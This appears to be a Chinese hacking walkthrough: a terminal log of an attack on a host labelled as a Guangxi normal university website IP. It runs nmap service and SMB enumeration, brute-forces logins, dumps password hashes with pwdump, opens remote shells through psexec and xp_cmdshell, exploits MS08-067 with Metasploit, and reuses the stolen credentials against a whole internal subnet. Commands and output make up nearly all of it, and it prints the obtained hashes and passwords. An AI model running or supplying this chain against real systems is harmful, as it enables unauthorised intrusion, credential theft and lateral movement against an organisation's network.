广西师范网站 http://202.103.242.241/

root@bt:~# nmap -sS -sV 202.103.242.241

Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 21:54 CST
Nmap scan report for bogon (202.103.242.241)
Host is up (0.00048s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE      VERSION
135/tcp  open  mstask       Microsoft mstask (task server - c:\winnt\system32\Mstask.exe)
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds Microsoft Windows 2000 microsoft-ds
1025/tcp open  mstask       Microsoft mstask (task server - c:\winnt\system32\Mstask.exe)
1026/tcp open  msrpc        Microsoft Windows RPC
3372/tcp open  msdtc?
3389/tcp open  ms-term-serv?
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at http://www.insecure.org/cgi-bin/servicefp-submit.cgi :
SF-Port3372-TCP:V=5.59BETA1%I=7%D=2/28%Time=4F4CDC90%P=i686-pc-linux-gnu%r
SF:(GetRequest,6,"hO\n\x000Z")%r(RTSPRequest,6,"hO\n\x000Z")%r(HTTPOptions
SF:,6,"hO\n\x000Z")%r(Help,6,"hO\n\x000Z")%r(SSLSessionReq,6,"hO\n\x000Z")
SF:%r(FourOhFourRequest,6,"hO\n\x000Z")%r(LPDString,6,"hO\n\x000Z")%r(SIPO
SF:ptions,6,"hO\n\x000Z");
MAC Address: 08:00:27 7:2E:79 (Cadmus Computer Systems)
Service Info: OS: Windows

Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 79.12 seconds
root@bt:/usr/local/share/nmap/scripts# ls -la | grep smb //列出扫描脚本

-rw-r--r-- 1 root root 44055 2011-07-09 07:36 smb-brute.nse
-rw-r--r-- 1 root root 27691 2011-07-09 07:36 smb-check-vulns.nse
-rw-r--r-- 1 root root  4806 2011-07-09 07:36 smb-enum-domains.nse
-rw-r--r-- 1 root root  3475 2011-07-09 07:36 smb-enum-groups.nse
-rw-r--r-- 1 root root  7958 2011-07-09 07:36 smb-enum-processes.nse
-rw-r--r-- 1 root root 12221 2011-07-09 07:36 smb-enum-sessions.nse
-rw-r--r-- 1 root root  6014 2011-07-09 07:36 smb-enum-shares.nse
-rw-r--r-- 1 root root 12216 2011-07-09 07:36 smb-enum-users.nse
-rw-r--r-- 1 root root  1658 2011-07-09 07:36 smb-flood.nse
-rw-r--r-- 1 root root  2906 2011-07-09 07:36 smb-os-discovery.nse
-rw-r--r-- 1 root root 61005 2011-07-09 07:36 smb-psexec.nse
-rw-r--r-- 1 root root  4362 2011-07-09 07:36 smb-security-mode.nse
-rw-r--r-- 1 root root  2311 2011-07-09 07:36 smb-server-stats.nse
-rw-r--r-- 1 root root 13719 2011-07-09 07:36 smb-system-info.nse
-rw-r--r-- 1 root root  1429 2011-07-09 07:36 smbv2-enabled.nse
root@bt:/usr/local/share/nmap/scripts# nmap --script=smb-enum-users.nse 202.103.242.241
//此乃使用脚本扫描远程机器所存在的账户名

Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:12 CST
Nmap scan report for bogon (202.103.242.241)
Host is up (0.00038s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
1025/tcp open  NFS-or-IIS
1026/tcp open  LSA-or-nterm
3372/tcp open  msdtc
3389/tcp open  ms-term-serv
MAC Address: 08:00:27 7:2E:79 (Cadmus Computer Systems)

Host script results:
| smb-enum-users:
|_  Domain: PG-F289F9A8EF3E; Users: Administrator, Guest, test, TsInternetUser //扫描结果

Nmap done: 1 IP address (1 host up) scanned in 1.09 seconds
root@bt:/usr/local/share/nmap/scripts# nmap --script=smb-enum-shares.nse 202.103.242.241
//查看共享

Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:15 CST
Nmap scan report for bogon (202.103.242.241)
Host is up (0.00035s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
1025/tcp open  NFS-or-IIS
1026/tcp open  LSA-or-nterm
3372/tcp open  msdtc
3389/tcp open  ms-term-serv
MAC Address: 08:00:27 7:2E:79 (Cadmus Computer Systems)

Host script results:
| smb-enum-shares:
|   ADMIN$
|     Anonymous access: <none>
|   C$
|     Anonymous access: <none>
|   IPC$
|_    Anonymous access: READ

Nmap done: 1 IP address (1 host up) scanned in 1.05 seconds
root@bt:/usr/local/share/nmap/scripts# nmap --script=smb-brute.nse 202.103.242.241
//获取用户密码

Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:17 CST
Nmap scan report for bogon (202.103.242.241)
Host is up (0.00041s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
1025/tcp open  NFS-or-IIS
1026/tcp open  LSA-or-nterm
3372/tcp open  msdtc
3389/tcp open  ms-term-serv
MAC Address: 08:00:27 7:2E:79 (Cadmus Computer Systems)

Host script results:
| smb-brute:
|   administrator:<blank> => Login was successful
|_  test:123456 => Login was successful

Nmap done: 1 IP address (1 host up) scanned in 28.22 seconds
root@bt:~# wget http://swamp.foofus.net/fizzgig/ ... -exe-only.tar.bz2 //抓hash
root@bt:~# tar -jxvf pwdump6-1.7.2-exe-only.tar.bz2 -C /usr/local/share/nmap/nselib/data
root@bt:/usr/local/share/nmap/scripts# wget https://svn.nmap.org/nmap-exp/dev/nmap/scripts/smb-pwdump.nse
root@bt:~# nmap --script=smb-pwdump.nse --script-args=smbuser=test,smbpass=123456 202.103.242.241 -p 135,445,139

Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-29 00:25 CST
Nmap scan report for bogon (202.103.242.241)
Host is up (0.0012s latency).
PORT    STATE SERVICE
135/tcp open  msrpc
139/tcp open  netbios-ssn
445/tcp open  microsoft-ds
MAC Address: 08:00:27 7:2E:79 (Cadmus Computer Systems)

Host script results:
| smb-pwdump:
|   Administrator:500 => NO PASSWORD*********************:NO PASSWORD*********************
|   Guest:501 => NO PASSWORD*********************:NO PASSWORD*********************
|   test:1002 => 44EFCE164AB921CAAAD3B435B51404EE:32ED87BDB5FDC5E9CBA88547376818D4
|_  TsInternetUser:1000 => A63D5FC7F284A6CC341A5A0240EF721E:262A84B3E8D4B1CC32131838448C98D2

Nmap done: 1 IP address (1 host up) scanned in 1.85 seconds
C:\Documents and Settings\Administrator\桌面>psexec.exe \\202.103.242.241 -u test -p 123456 -e cmd.exe //获取一个cmdshell

PsExec v1.55 - Execute processes remotely
Copyright (C) 2001-2004 Mark Russinovich
Sysinternals - www.sysinternals.com

Microsoft Windows 2000 [Version 5.00.2195]
(C) 版权所有 1985-2000 Microsoft Corp.

C:\WINNT\system32>ipconfig

Windows 2000 IP Configuration

Ethernet adapter 本地连接:

        Connection-specific DNS Suffix . :
        IP Address. . . . . . . . . . . . : 202.103.242.241
        Subnet Mask . . . . . . . . . . . : 255.255.255.0
        Default Gateway . . . . . . . . . : 202.103.1.1

C:\Documents and Settings\Administrator\桌面\osql>osql.exe -S 202.103.242.241 -U sa -P "123456" -Q "exec master..xp_cmdshell 'net user'" //远程登录sa执行命令
root@bt:/usr/local/share/nmap/scripts# nmap --script=smb-check-vulns.nse 202.103.242.241 //检测目标机器漏洞

Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-29 00:41 CST
Nmap scan report for bogon (202.103.242.241)
Host is up (0.00046s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
1025/tcp open  NFS-or-IIS
1026/tcp open  LSA-or-nterm
3372/tcp open  msdtc
3389/tcp open  ms-term-serv
MAC Address: 08:00:27 7:2E:79 (Cadmus Computer Systems)

Host script results:
| smb-check-vulns:
|_  MS08-067: VULNERABLE

Nmap done: 1 IP address (1 host up) scanned in 1.43 seconds
root@bt:~# msfconsole //在msf上利用ms08-067漏洞对目标机器进行溢出

msf > search ms08
msf > use exploit/windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > show options
msf exploit(ms08_067_netapi) > set RHOST 202.103.242.241
msf exploit(ms08_067_netapi) > show payloads
msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/bind_tcp
msf exploit(ms08_067_netapi) > exploit
meterpreter >
Background session 2? [y/N] (ctrl+z)
msf exploit(ms08_067_netapi) > sessions -l
root@bt:/usr/local/share/nmap/scripts# vim usernames.txt
test
administrator

root@bt:/usr/local/share/nmap/scripts# vim password.txt
44EFCE164AB921CAAAD3B435B51404EE

root@bt:/usr/local/share/nmap/scripts# nmap --script=smb-brute.nse --script-args=userdb=usernames.txt,passdb=password.txt 192.168.1.1-254
//利用用户名跟获取的hash尝试对整段内网进行登录

Nmap scan report for 192.168.1.105
Host is up (0.00088s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
1025/tcp open  NFS-or-IIS
1026/tcp open  LSA-or-nterm
3372/tcp open  msdtc
3389/tcp open  ms-term-serv
MAC Address: 08:00:27 7:2E:79 (Cadmus Computer Systems)

Host script results:
| smb-brute:
|_  administrator:<blank> => Login was successful

攻击成功，一个简单的msf+nmap攻击~~